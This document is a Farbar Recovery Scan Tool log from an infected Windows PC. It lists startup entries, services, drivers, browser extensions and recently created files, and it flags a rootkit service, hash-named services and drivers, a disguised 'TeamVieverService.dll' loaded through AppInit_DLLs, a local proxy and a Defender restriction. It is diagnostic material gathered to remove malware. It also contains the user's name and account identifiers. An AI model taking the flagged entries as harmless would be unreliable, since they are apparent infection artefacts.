(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSPanel.exe

(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPHelper.exe

(Intel Corporation) C:\Windows\System32\igfxpers.exe

(Intel Corporation) C:\Windows\System32\igfxsrvc.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe

(Microsoft Corporation) C:\Program Files\Windows NT\Accessories\wordpad.exe

(Microsoft Corporation) C:\Windows\System32\cmd.exe

 

==================== Registry (Whitelisted) ===========================

 

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

 

HKLM\...\Run: [COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10}] => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [1610936 2016-07-10] (COMODO)

HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)

HKLM-x32\...\Run: [WebStorage] => C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\ASUSWSLoader.exe [63296 2014-02-25] ()

HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [95192 2013-03-08] (CyberLink Corp.)

HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [1980416 2013-12-18] (Wondershare)

HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-04-21] (Apple Inc.)

HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime Alternative\QTTask.exe [421888 2013-05-01] (Apple Inc.)

HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2383040 2016-08-24] (Adobe Systems Incorporated)

HKLM-x32\...\Run: [chrome] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [1589592 2018-03-20] (Google Inc.)

Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)

HKLM\...\Policies\Explorer: [NoInternetOpenWith] 1

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Run: [xdm] => C:\Users\Dan\AppData\Local\XDM\xdm.exe [782848 2014-11-15] (Subhra Das Gupta)

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8641240 2016-02-12] (Piriform Ltd)

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MountPoints2: {536ca0a9-5ee7-11e8-8342-10c37bbb446b} - "D:\windows\AutoRun.exe"

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MountPoints2: {536ca102-5ee7-11e8-8342-10c37bbb446b} - "D:\windows\AutoRun.exe"

AppInit_DLLs-x32: C:\ProgramData\TeamVieverService.dll => C:\ProgramData\TeamVieverService.dll [267264 2018-03-23] ()

Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HandyAndy.lnk [2016-05-16]

ShortcutTarget: HandyAndy.lnk -> C:\Program Files\Andy\HandyAndy.exe ()

 

==================== Internet (Whitelisted) ====================

 

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

 

ProxyEnable: [.DEFAULT] => Proxy is enabled.

ProxyServer: [.DEFAULT] => http=127.0.0.1:61746;https=127.0.0.1:61746

ProxyEnable: [S-1-5-21-1066246007-1091995785-1061003623-1001] => Proxy is enabled.

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt

Tcpip\..\Interfaces\{4BFECB1F-C4F4-478B-9423-CF38BB3D1339}: [DhcpNameServer] 167.206.112.3 167.206.112.4

Tcpip\..\Interfaces\{ADE3F806-57EF-4246-85D9-1A41A1425F70}: [DhcpNameServer] 208.67.222.222 208.67.220.220

 

Internet Explorer:

==================

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =

HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =

HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?gws_rd=ssl

SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =

SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =

BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\ssv.dll [2016-02-07] (Oracle Corporation)

BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\jp2ssv.dll [2016-02-07] (Oracle Corporation)

 

FireFox:

========

FF DefaultProfile: jefccanc.Daniel-1506042165545

FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default [2018-06-08]

FF Extension: (Avira Browser Safety) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\abs@avira.com.xpi [2017-06-17]

FF Extension: (Quick Searcher) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\mefhakmgclhhfbdadeojlkbllmecialg@chrome-store-foxified-1132576233 [2018-03-22]

FF Extension: (Video DownloadHelper) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2017-05-31] [Legacy]

FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\uxz090y6.default-1505963547810 [2018-06-08]

FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\jefccanc.Daniel-1506042165545 [2018-06-08]

FF HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Firefox\Extensions: [xdmff@xdman.sourceforge.net] - C:\Users\Dan\AppData\Local\XDM\xdmff

FF Extension: (XDM Helper) - C:\Users\Dan\AppData\Local\XDM\xdmff [2016-04-03] [Legacy] [not signed]

FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-08-24] (Adobe Systems)

FF Plugin-x32: @java.com/DTPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\dtplugin\npDeployJava1.dll [2016-02-07] (Oracle Corporation)

FF Plugin-x32: @java.com/JavaPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\plugin2\npjp2.dll [2016-02-07] (Oracle Corporation)

FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-04-01] (Microsoft Corporation)

FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-15] (Google Inc.)

FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-15] (Google Inc.)

FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program File (x86) VLC Media Player VideoLan\VLC\npvlc.dll [2016-06-01] (VideoLAN)

FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program File (x86) VLC Media Player VideoLan\VLC\npvlc.dll [2016-06-01] (VideoLAN)

FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [No File]

FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-02-11] (Adobe Systems Inc.)

FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-08-24] (Adobe Systems)

FF Plugin HKU\S-1-5-21-1066246007-1091995785-1061003623-1001: signiant.com/SigniantTransfer -> C:\Users\Dan\AppData\Roaming\SigniantInc\SigniantTransfer\5.4.4.71844\npSigniantTransfer.dll [2015-07-09] (Signiant Inc.)

 

Chrome:

=======

CHR DefaultProfile: Default

CHR HomePage: Default -> search.mpc.am

CHR StartupUrls: Default -> "hxxps://www.google.com/"

CHR Profile: C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default [2018-06-08]

CHR Extension: (Slides) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-22]

CHR Extension: (Facebook Video Downloader - Save FB Video) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\amjcoehkcacocffpmhnefgoeanepjfkf [2018-03-20]

CHR Extension: (Docs) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-22]

CHR Extension: (Instagram tools) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apchgljmbdmgpelofkpfaghmjcgkcmmb [2016-04-03]

CHR Extension: (Google Drive) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-04-03]

CHR Extension: (Audiotool) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkgoccjhfjgjedhkiefaclppgbmoobnk [2016-04-03]

CHR Extension: (YouTube) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-04-03]

CHR Extension: (Nimbus Screenshot & Screen Video Recorder) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\bpconcjcammlapcogcnnelfmaeghhagj [2018-02-04]

CHR Extension: (APK Downloader) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgihflhdpokeobcfimliamffejfnmfii [2016-04-03]

CHR Extension: (Google Search) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-04-03]

CHR Extension: (Sheets) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-22]

CHR Extension: (Avira Browser Safety) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2017-06-10]

CHR Extension: (Trevx - Music Downloader) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmaepaboafhefdejcbiciklgjogoghf [2016-05-15]

CHR Extension: (Google Docs Offline) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-04-03]

CHR Extension: (Video DownloadHelper) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjnegcaeklhafolokijcfjliaokphfk [2016-12-20]

CHR Extension: (Video Converter) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcjjnhgakghmggnimjkldjmmpabhnhne [2016-03-08]

CHR Extension: (Chrome Web Store Payments) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22]

CHR Extension: (Image Search) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\oeofhjjmgagmjigkfgghbnjjeibokcik [2016-11-22]

CHR Extension: (Notifications for Instagram) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\opnbmdkdflhjiclaoiiifmheknpccalb [2018-01-15]

CHR Extension: (Quick Searcher) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbdpajcdgknpendpmecafmopknefafha [2018-03-22]

CHR Extension: (Adobe HDS / HLS Video Saver) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pibndofbpkoaipoidbkephfhhnapkccn [2018-03-08]

CHR Extension: (Gmail) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-04-03]

CHR Extension: (Chrome Media Router) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-03-22]

CHR Extension: (Instagram) - C:\Program File (x86) ArcWelder - Android Simulator (Google Chrome) - Instagram\com.instagram.android.apk_export_eznre [2016-03-13]

CHR Profile: C:\Users\Dan\AppData\Local\Google\Chrome\User Data\System Profile [2018-06-08]

CHR Extension: (Quick Searcher) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pbdpajcdgknpendpmecafmopknefafha [2018-03-22]

CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx

CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx

CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx

 

==================== Services (Whitelisted) ====================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

HKLM\SYSTEM\CurrentControlSet\Services\eubtvna <==== ATTENTION (Rootkit!)

 

S2 6320c4d4d9492959f6f8b43b8fdbf2f5; C:\Program Files\6320c4d4d9492959f6f8b43b8fdbf2f5\890117e400ab1707a9d681317614c87e.exe [1795584 2018-03-22] () [File not signed] <==== ATTENTION

R2 9b2582d4a23748e2d93e755c9fbf7de5; C:\Windows\9b2582d4a23748e2d93e755c9fbf7de5.dll [2150400 2018-03-22] () [File not signed]

R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-08-24] (Adobe Systems Incorporated)

R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2021056 2016-03-03] (Adobe Systems, Incorporated)

R2 Asus WebStorage Windows Service; C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSWinService.exe [71680 2014-02-25] (ASUS Cloud Corporation) [File not signed]

S2 CmdAgent; C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe [5817256 2016-07-10] (COMODO)

S3 cmdvirth; C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe [2271928 2016-07-10] (COMODO)

R2 dahhService; C:\ProgramData\dahhService\dahhService.exe [369872 2018-03-22] ()

R2 gramblrclient; C:\Program Files\Gramblr\gramblr.exe [12021840 2018-03-07] () [File not signed]

S4 gzserv; C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\gzserv.exe [79552 2018-03-08] (Bitdefender)

R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [733696 2013-07-01] (Intel® Corporation) [File not signed]

S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-01] (Intel® Corporation)

S2 MBAMService; C:\Program File (x86) Malwarebytes Anti-Malware - VER. 2-B\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)

S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [118520 2013-02-28] (Riverbed Technology, Inc.)

R2 sesvc; C:\Program File (x86) ShadowExplorer\ShadowExplorer\sesvc.exe [9216 2011-01-02] (www.shadowexplorer.com) [File not signed]

S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [368632 2014-09-21] (Microsoft Corporation)

S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2014-09-21] (Microsoft Corporation)

S2 GamesAppIntegrationService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe" [X]

S3 GamesAppService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe" [X]

S4 windowsmanagementservice; windowsmanagementservice [X] <==== ATTENTION

 

===================== Drivers (Whitelisted) ======================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

R1 6bbfa1b48d3fadbf9e2e973e703b29a9; C:\Windows\system32\drivers\6bbfa1b48d3fadbf9e2e973e703b29a9.sys [79776 2018-03-22] ()

R3 athr; C:\Windows\system32\DRIVERS\athwbx.sys [3892224 2014-03-07] (Qualcomm Atheros Communications, Inc.)

R3 ATP; C:\Windows\System32\drivers\AsusTP.sys [71952 2014-03-31] (ASUS Corporation)

R0 avc3; C:\Windows\System32\DRIVERS\avc3.sys [718840 2013-04-17] (BitDefender)

U5 avchv; C:\Windows\System32\Drivers\avchv.sys [261056 2016-03-06] (BitDefender)

S3 avckf; C:\Windows\System32\DRIVERS\avckf.sys [593144 2013-04-17] (BitDefender)

R1 bdfwfpf; C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\bdfwfpf.sys [121928 2013-07-02] (Bitdefender SRL)

R1 cmderd; C:\Windows\System32\DRIVERS\cmderd.sys [32224 2016-07-10] (COMODO)

R1 cmdGuard; C:\Windows\System32\DRIVERS\cmdguard.sys [851864 2016-07-10] (COMODO)

R1 cmdhlp; C:\Windows\system32\DRIVERS\cmdhlp.sys [45600 2016-07-10] (COMODO)

R1 gzflt; C:\Windows\System32\DRIVERS\gzflt.sys [148696 2013-04-22] (BitDefender LLC)

R1 inspect; C:\Windows\system32\DRIVERS\inspect.sys [138568 2016-07-10] (COMODO)

R3 kbfiltr; C:\Windows\System32\drivers\kbfiltr.sys [17280 2012-08-05] ( )

R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)

S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)

R0 MBI; C:\Windows\System32\drivers\MBI.sys [29464 2013-10-27] (Intel Corporation)

S3 NPF; C:\Windows\System32\drivers\npf.sys [36600 2013-02-28] (Riverbed Technology, Inc.)

R3 TotRec8; C:\Windows\system32\drivers\TotRec8.sys [125640 2014-04-30] (High Criteria inc.)

U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [24688 2017-06-09] ()

R0 trufos; C:\Windows\System32\DRIVERS\trufos.sys [382536 2013-05-28] (BitDefender S.R.L.)

R3 TXEIx64; C:\Windows\System32\drivers\TXEIx64.sys [88592 2014-01-15] (Intel Corporation)

R3 VASDeviceDrm; C:\Windows\system32\drivers\vasdDev.sys [1454896 2012-03-19] (ShiningMorning Inc.)

R0 vsock; C:\Windows\System32\drivers\vsock.sys [73296 2013-10-08] (VMware, Inc.)

S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [35320 2014-09-21] (Microsoft Corporation)

S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [258368 2014-09-21] (Microsoft Corporation)

S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2014-09-21] (Microsoft Corporation)

S4 hrlvm; System32\drivers\usbcmpvz.sys [X]

R3 loruyb; system32\drivers\ruybeh.sys [X]

 

==================== NetSvcs (Whitelisted) ===================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

 

==================== One Month Created files and folders ========

 

(If an entry is included in the fixlist, the file/folder will be moved.)

 

2018-06-14 21:36 - 2018-06-14 21:36 - 000000077 _____ C:\Users\Dan\AppData\Local\smplayerhdpi.ini

2018-06-14 21:19 - 2018-06-14 21:19 - 000000000 ____D C:\Users\Dan\AppData\Local\iaclvtr

2018-06-14 21:16 - 2018-06-14 21:16 - 000142672 ____N C:\Windows\system32\Drivers\coooruyb.sys

2018-06-14 21:15 - 2018-06-14 21:15 - 000000000 ____D C:\Users\Dan\AppData\Local\msixzrn

2018-06-14 20:57 - 2018-06-14 20:57 - 000000000 ____D C:\Users\Dan\AppData\Local\auekvlx

2018-06-14 20:26 - 2018-06-14 20:26 - 000000000 ____D C:\Users\Dan\AppData\Local\sbmzaxe

2018-06-13 20:15 - 2018-06-13 20:15 - 000000000 ____D C:\Users\Dan\AppData\Local\pwaclvh

2018-06-12 20:35 - 2018-06-12 20:35 - 000000000 ____D C:\Users\Dan\AppData\Local\iabokse

2018-06-12 20:13 - 2018-06-12 20:13 - 000000000 ____D C:\Users\Dan\AppData\Local\sietnkv

2018-06-11 21:38 - 2018-06-11 21:38 - 000000000 ____D C:\Users\Dan\AppData\Local\vsdkhmb

2018-06-11 21:17 - 2018-06-11 21:17 - 000000000 ____D C:\Users\Dan\AppData\Local\cwkbude

2018-06-11 20:54 - 2018-06-11 20:54 - 000000000 ____D C:\Users\Dan\AppData\Local\ianhgkz

2018-06-11 20:14 - 2018-06-11 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\spnamrh

2018-06-10 20:19 - 2018-06-10 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\wdhvpka

2018-06-09 19:36 - 2018-06-09 19:36 - 000000000 ____D C:\Users\Dan\AppData\Local\psnwzov

2018-06-08 20:22 - 2018-06-08 20:22 - 000000000 ____D C:\Users\Dan\AppData\Local\sprxnmw

2018-06-07 20:25 - 2018-06-07 20:25 - 000000000 ____D C:\Users\Dan\AppData\Local\zaothbn

2018-06-06 20:16 - 2018-06-06 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\upcnzih

2018-06-05 20:19 - 2018-06-05 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\wdavblr

2018-06-04 20:46 - 2018-06-04 20:46 - 000000000 ____D C:\Users\Dan\AppData\Local\upmrihe

2018-06-04 20:15 - 2018-06-04 20:15 - 000000000 ____D C:\Users\Dan\AppData\Local\widgtzk

2018-06-03 20:18 - 2018-06-03 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\msapgde

2018-06-02 19:42 - 2018-06-02 19:42 - 000000000 ____D C:\Users\Dan\AppData\Local\reepcgo

2018-06-01 20:21 - 2018-06-01 20:21 - 000000000 ____D C:\Users\Dan\AppData\Local\wmkxhrt

2018-05-31 20:24 - 2018-05-31 20:24 - 000000000 ____D C:\Users\Dan\AppData\Local\sinxrlt

2018-05-30 20:20 - 2018-05-30 20:20 - 000000000 ____D C:\Users\Dan\AppData\Local\mbiczhw

2018-05-29 20:47 - 2018-05-29 21:04 - 000003084 _____ C:\Windows\System32\Tasks\{D3CF4331-7A31-4F84-BB21-69FA5F743E7A}

2018-05-29 20:16 - 2018-05-29 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\avcsxeg

2018-05-28 20:16 - 2018-05-28 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\dtiroaw

2018-05-27 20:40 - 2018-05-27 20:40 - 000000146 _____ C:\Users\Dan\Desktop\Windows Defender - Shortcut.lnk

2018-05-27 20:12 - 2018-05-27 20:12 - 000000000 ____D C:\Users\Dan\AppData\Local\vdmbsup

2018-05-26 19:39 - 2018-05-26 19:39 - 000000000 ____D C:\Users\Dan\AppData\Local\cgkeslp

2018-05-25 20:18 - 2018-05-25 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\nimzwrx

2018-05-24 20:16 - 2018-05-24 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\svhznix

2018-05-23 23:10 - 2018-05-23 23:10 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf

2018-05-23 21:13 - 2018-05-23 21:13 - 000081134 _____ C:\Users\Dan\AppData\Local\recently-used.xbel

2018-05-23 20:16 - 2018-05-23 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\coeaubg

2018-05-22 20:15 - 2018-05-22 20:15 - 000000000 ____D C:\Users\Dan\AppData\Local\lsrgdch

2018-05-21 18:54 - 2018-05-21 18:54 - 000000000 ____D C:\Users\Dan\AppData\Local\tihexad

2018-05-20 19:05 - 2018-05-20 19:05 - 000000000 ____D C:\Users\Dan\AppData\Local\rtksgep

2018-05-19 19:36 - 2018-05-19 19:36 - 000000000 ____D C:\Users\Dan\AppData\Local\usbziol

2018-05-18 20:19 - 2018-05-18 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\mskiwue

2018-05-17 20:18 - 2018-05-17 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\wictgzl

2018-05-16 20:14 - 2018-05-16 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\scdhbzo

2018-05-15 20:14 - 2018-05-15 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\dwczukm

 

==================== One Month Modified files and folders ========

 

(If an entry is included in the fixlist, the file/folder will be moved.)

 

2018-06-14 21:42 - 2016-03-03 14:05 - 000000000 ____D C:\FRST

2018-06-14 21:36 - 2016-06-12 19:00 - 000000000 ____D C:\Users\Dan\.smplayer

2018-06-14 21:27 - 2017-03-29 19:14 - 000000074 _____ C:\Users\Dan\AppData\Roaming\sp_data.sys

2018-06-14 21:26 - 2018-03-22 21:52 - 000000004 _____ C:\ProgramData\lock.dat

2018-06-14 21:25 - 2015-02-09 00:09 - 000000000 __RDO C:\Users\Dan\OneDrive

2018-06-14 21:23 - 2015-02-01 10:08 - 000000000 ____D C:\Users\Dan\AppData\Local\Adobe

2018-06-14 21:22 - 2015-11-12 20:24 - 000000000 ____D C:\ProgramData\VMware

2018-06-14 21:19 - 2018-03-22 21:53 - 000000000 ____D C:\Users\Dan\AppData\Local\aucozre

2018-06-14 21:19 - 2018-03-22 21:52 - 000000388 _____ C:\ProgramData\rwi.hhad

2018-06-14 21:19 - 2015-11-13 20:19 - 000000000 ____D C:\ProgramData\Gramblr

2018-06-14 21:18 - 2013-08-22 10:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT

2018-06-14 21:17 - 2018-03-22 21:52 - 002888704 _____ (TOSHIBA CORPORATION) C:\Windows\system32\avmhengsvc.exe

2018-06-14 21:16 - 2013-08-22 09:25 - 012845056 _____ C:\Windows\system32\config\HARDWARE

2018-06-14 20:55 - 2013-08-22 09:25 - 000524288 ___SH C:\Windows\system32\config\BBI

2018-06-13 23:29 - 2015-02-05 08:20 - 000000000 ____D C:\Users\Dan\AppData\Roaming\vlc

2018-06-13 21:02 - 2015-02-03 07:57 - 000000000 ____D C:\Users\Dan\AppData\Local\ocenaudio

2018-06-12 21:29 - 2016-07-05 19:49 - 000000000 ____D C:\ProgramData\boost_interprocess

2018-06-11 21:59 - 2013-08-22 11:36 - 000000000 ____D C:\Windows\system32\NDF

2018-06-08 20:32 - 2013-08-22 09:36 - 000000000 ____D C:\Windows\Inf

2018-06-07 21:59 - 2016-08-26 20:21 - 000000000 ____D C:\Users\Dan\Documents\A - RESTORED FILES - DAN

2018-05-31 20:45 - 2016-07-18 13:30 - 000000000 ____D C:\Users\Dan\Desktop\Video & Various  Software Shortcuts

2018-05-29 22:18 - 2018-03-24 18:39 - 000000000 ____D C:\Users\Dan\AppData\Local\ElevatedDiagnostics

2018-05-29 21:19 - 2017-01-25 19:42 - 000000000 ____D C:\Windows\Minidump

2018-05-29 21:19 - 2016-03-07 20:08 - 000000000 ____D C:\Users\Dan\AppData\Local\CrashDumps

2018-05-29 21:04 - 2018-03-22 21:50 - 000003626 _____ C:\Windows\System32\Tasks\{81D52804-7B29-49D2-80AA-07954E82952B}

2018-05-29 21:04 - 2018-03-22 21:50 - 000003424 _____ C:\Windows\System32\Tasks\{C26243DB-2C37-44EE-9F28-CE2E8B7FC0E3}

2018-05-29 21:04 - 2016-06-16 10:58 - 000003030 _____ C:\Windows\System32\Tasks\{31DDBD37-5DB7-4030-8064-10B0CAA806C3}

2018-05-29 21:04 - 2015-02-11 20:37 - 000003378 _____ C:\Windows\System32\Tasks\{CF06CADB-185A-4E37-941E-EF8A74A640B8}

2018-05-29 21:04 - 2015-02-11 20:32 - 000003286 _____ C:\Windows\System32\Tasks\{7AABF775-AB66-4734-B6C6-CD26D49E39AF}

2018-05-29 20:47 - 2018-03-22 21:51 - 000000000 ____D C:\Program Files (x86)\s5

2018-05-24 20:30 - 2014-03-18 05:47 - 001164886 _____ C:\Windows\system32\PerfStringBackup.INI

2018-05-23 21:13 - 2016-07-10 13:03 - 000000000 ____D C:\Users\Dan\AppData\Local\gtk-2.0

2018-05-23 21:13 - 2015-02-04 11:43 - 000000000 ____D C:\Users\Dan\.gimp-2.8

 

==================== Files in the root of some directories =======

 

2018-03-22 21:52 - 2018-06-14 21:26 - 000000004 _____ () C:\ProgramData\lock.dat

2018-03-23 18:46 - 2018-03-23 18:46 - 000267264 _____ () C:\ProgramData\TeamVieverService.dll

